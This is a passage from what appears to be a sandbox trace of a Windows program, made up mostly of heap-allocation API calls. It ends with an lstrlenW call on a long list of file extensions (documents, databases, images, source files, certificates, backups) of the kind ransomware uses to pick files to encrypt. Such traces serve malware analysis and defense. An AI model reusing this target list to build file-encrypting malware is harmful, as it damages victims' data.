RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x614cd0 [0264.610] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x4) returned 0x619368 [0264.610] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x614ce8 [0264.610] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x4) returned 0x619320 [0264.610] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x614d00 [0264.610] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x619320, Size=0x8) returned 0x619320 [0264.610] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x614d18 [0264.610] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x619320, Size=0x10) returned 0x619320 [0264.610] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x614d30 [0264.610] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x614d48 [0264.610] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x619320, Size=0x20) returned 0x619418 [0264.610] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x614d60 [0264.610] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x619320 [0264.610] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xe) returned 0x614d78 [0264.610] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xe) returned 0x614d90 [0264.610] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x619418, Size=0x40) returned 0x619418 [0264.610] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xe) returned 0x614da8 [0264.610] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xe) returned 0x614dc0 [0264.610] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xe) returned 0x614dd8 [0264.610] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xe) returned 0x614df0 [0264.610] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x614e08 [0264.610] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x614e20 [0264.610] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x619330 [0264.610] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x614e38 [0264.610] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x619418, Size=0x80) returned 0x61bd88 [0264.610] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x614e50 [0264.611] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x614e68 [0264.611] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x614e80 [0264.611] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x61d2c0 [0264.611] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x61d2d8 [0264.611] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x61d2f0 [0264.611] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x61d308 [0264.611] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x61d6a8 [0264.611] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x61d320 [0264.611] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x61d338 [0264.611] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x61d350 [0264.611] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x61d368 [0264.611] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x61d380 [0264.611] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x61d398 [0264.611] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x61d3b0 [0264.611] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x61d3c8 [0264.611] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x61bd88, Size=0x100) returned 0x61d8c0 [0264.611] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x61d3e0 [0264.611] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x61d3f8 [0264.611] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x61d410 [0264.611] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x61d428 [0264.611] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x61d440 [0264.611] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x61d458 [0264.611] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x61d6b8 [0264.611] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x61d470 [0264.611] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x61d488 [0264.611] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x61d4a0 [0264.611] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x6) returned 0x661d38 [0264.611] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x61d4b8 [0264.611] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x61d4d0 [0264.611] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x661d48 [0264.611] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x61d4e8 [0264.611] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x61d500 [0264.611] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x61d518 [0264.611] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x61d530 [0264.611] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x61d548 [0264.611] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x61d560 [0264.611] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xe) returned 0x61d578 [0264.611] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x61d590 [0264.612] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x61d5a8 [0264.612] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x61d5c0 [0264.612] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x61d5d8 [0264.612] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x61d5f0 [0264.612] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x61d608 [0264.612] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x661d58 [0264.612] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x61d620 [0264.612] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x61d638 [0264.612] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x61d650 [0264.612] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x61d668 [0264.612] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x61d8c0, Size=0x200) returned 0x61d8c0 [0264.612] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x61d680 [0264.612] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x661d68 [0264.612] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x662138 [0264.612] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x662150 [0264.612] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x662168 [0264.612] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x662180 [0264.612] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x662198 [0264.612] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6621b0 [0264.612] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6621c8 [0264.612] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6621e0 [0264.612] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6621f8 [0264.612] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x662210 [0264.612] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x662228 [0264.612] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x662240 [0264.612] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x662258 [0264.612] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x662270 [0264.612] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x662288 [0264.612] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6622a0 [0264.612] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x6622b8 [0264.612] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x6622d0 [0264.612] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6622e8 [0264.612] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x662300 [0264.612] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x662318 [0264.612] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x661d78 [0264.612] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x662330 [0264.612] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x662348 [0264.612] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x662360 [0264.612] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x661d88 [0264.613] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x662378 [0264.613] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x662390 [0264.613] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6623a8 [0264.613] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6623c0 [0264.613] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6623d8 [0264.613] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6623f0 [0264.613] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x662408 [0264.613] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x662420 [0264.613] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x662438 [0264.613] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x662450 [0264.613] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x662468 [0264.613] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x662480 [0264.613] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x662498 [0264.613] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x6624b0 [0264.613] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6624c8 [0264.613] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6624e0 [0264.613] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6624f8 [0264.613] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x662538 [0264.613] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x662550 [0264.613] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x662568 [0264.613] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x662580 [0264.613] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x661d98 [0264.613] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x6) returned 0x661da8 [0264.613] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x662598 [0264.613] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6625b0 [0264.613] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6625c8 [0264.613] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6625e0 [0264.613] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6625f8 [0264.613] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x662610 [0264.613] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x662628 [0264.613] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x662640 [0264.613] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x662658 [0264.613] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x662670 [0264.613] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x662688 [0264.613] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6626a0 [0264.613] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6626b8 [0264.613] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x61d8c0, Size=0x400) returned 0x662920 [0264.613] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6626d0 [0264.614] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6626e8 [0264.614] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x662700 [0264.614] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x662718 [0264.614] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x662730 [0264.614] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x662748 [0264.614] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x662760 [0264.614] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x662778 [0264.614] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x662790 [0264.614] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6627a8 [0264.614] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x661db8 [0264.614] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6627c0 [0264.614] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x6627d8 [0264.614] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6627f0 [0264.614] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x662808 [0264.614] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x662820 [0264.614] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x662838 [0264.614] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xe) returned 0x662850 [0264.614] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x662868 [0264.614] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x662880 [0264.614] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x662898 [0264.614] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6628b0 [0264.614] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6628c8 [0264.614] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6628e0 [0264.614] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6628f8 [0264.614] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63ed38 [0264.614] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x661dc8 [0264.614] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63ed50 [0264.614] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63ed68 [0264.614] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63ed80 [0264.614] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63ed98 [0264.614] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63edb0 [0264.614] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63edc8 [0264.614] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63ede0 [0264.614] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63edf8 [0264.615] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63ee10 [0264.615] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xe) returned 0x63ee28 [0264.615] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63ee40 [0264.615] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xe) returned 0x63ee58 [0264.615] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63ee70 [0264.615] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63ee88 [0264.615] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63eea0 [0264.615] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63eeb8 [0264.615] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63eed0 [0264.615] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x63eee8 [0264.615] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63ef00 [0264.615] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63ef18 [0264.615] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63ef30 [0264.615] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63ef48 [0264.615] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63ef60 [0264.615] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63ef78 [0264.615] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63ef90 [0264.615] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63efa8 [0264.615] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63efc0 [0264.615] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63efd8 [0264.615] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63eff0 [0264.615] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63f008 [0264.615] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63f020 [0264.615] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63f038 [0264.615] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63f050 [0264.615] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63f068 [0264.615] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63f080 [0264.615] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x63f098 [0264.615] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x12) returned 0x61a058 [0264.615] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63f0b0 [0264.615] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63f0c8 [0264.615] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63f0e0 [0264.615] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63f0f8 [0264.615] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63f138 [0264.615] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63f150 [0264.615] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63f168 [0264.616] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63f180 [0264.616] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63f198 [0264.616] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63f1b0 [0264.616] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63f1c8 [0264.616] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63f1e0 [0264.616] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63f1f8 [0264.616] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63f210 [0264.616] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63f228 [0264.616] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63f240 [0264.616] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63f258 [0264.616] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63f270 [0264.616] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63f288 [0264.616] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63f2a0 [0264.616] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x63f2b8 [0264.616] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x63f2d0 [0264.616] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x63f2e8 [0264.616] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xe) returned 0x63f300 [0264.616] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x63f318 [0264.616] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x661dd8 [0264.616] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63f330 [0264.616] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x661de8 [0264.616] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63f348 [0264.616] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63f360 [0264.616] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63f378 [0264.616] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x63f390 [0264.616] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x63f3a8 [0264.616] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63f3c0 [0264.616] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x63f3d8 [0264.616] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63f3f0 [0264.616] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63f408 [0264.616] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x63f420 [0264.616] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63f438 [0264.616] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x63f450 [0264.616] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x63f468 [0264.617] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63f480 [0264.617] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x661df8 [0264.617] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63f498 [0264.617] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x63f4b0 [0264.617] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x662920, Size=0x800) returned 0x63f920 [0264.617] lstrlenW (lpString=".1cd;.3ds;.3fr;.3g2;.3gp;.7z;.accda;.accdb;.accdc;.accde;.accdt;.accdw;.adb;.adp;.ai;.ai3;.ai4;.ai5;.ai6;.ai7;.ai8;.anim;.arw;.as;.asa;.asc;.ascx;.asm;.asmx;.asp;.aspx;.asr;.asx;.avi;.avs;.backup;.bak;.bay;.bd;.bin;.bmp;.bz2;.c;.cdr;.cer;.cf;.cfc;.cfm;.cfml;.cfu;.chm;.cin;.class;.clx;.config;.cpp;.cr2;.crt;.crw;.cs;.css;.csv;.cub;.dae;.dat;.db;.dbf;.dbx;.dc3;.dcm;.dcr;.der;.dib;.dic;.dif;.divx;.djvu;.dng;.doc;.docm;.docx;.dot;.dotm;.dotx;.dpx;.dqy;.dsn;.dt;.dtd;.dwg;.dwt;.dx;.dxf;.edml;.efd;.elf;.emf;.emz;.epf;.eps;.epsf;.epsp;.erf;.exr;.f4v;.fido;.flm;.flv;.frm;.fxg;.geo;.gif;.grs;.gz;.h;.hdr;.hpp;.hta;.htc;.htm;.html;.icb;.ics;.iff;.inc;.indd;.ini;.iqy;.j2c;.j2k;.java;.jp2;.jpc;.jpe;.jpeg;.jpf;.jpg;.jpx;.js;.jsf;.json;.jsp;.kdc;.kmz;.kwm;.lasso;.lbi;.lgf;.lgp;.log;.m1v;.m4a;.m4v;.max;.md;.mda;.mdb;.mde;.mdf;.mdw;.mef;.mft;.mfw;.mht;.mhtml;.mka;.mkidx;.mkv;.mos;.mov;.mp3;.mp4;.mpeg;.mpg;.mpv;.mrw;.msg;.mxl;.myd;.myi;.nef;.nrw;.obj;.odb;.odc;.odm;.odp;.ods;.oft;.one;.onepkg;.onetoc2;.opt;.oqy;.orf;.p12;.p7b;.p7c;.pam;.pbm;.pct;.pcx;.pdd;.pdf;.pdp;.pef;.pem;.pff;.pfm;.pfx;.pgm;.php;.php3;.php4;.php5;.phtml;.pict;.pl;.pls;.pm;.png;.pnm;.pot;.potm;.potx;.ppa;.ppam;.ppm;.pps;.ppsm;.ppt;.pptm;.pptx;.prn;.ps;.psb;.psd;.pst;.ptx;.pub;.pwm;.pxr;.py;.qt;.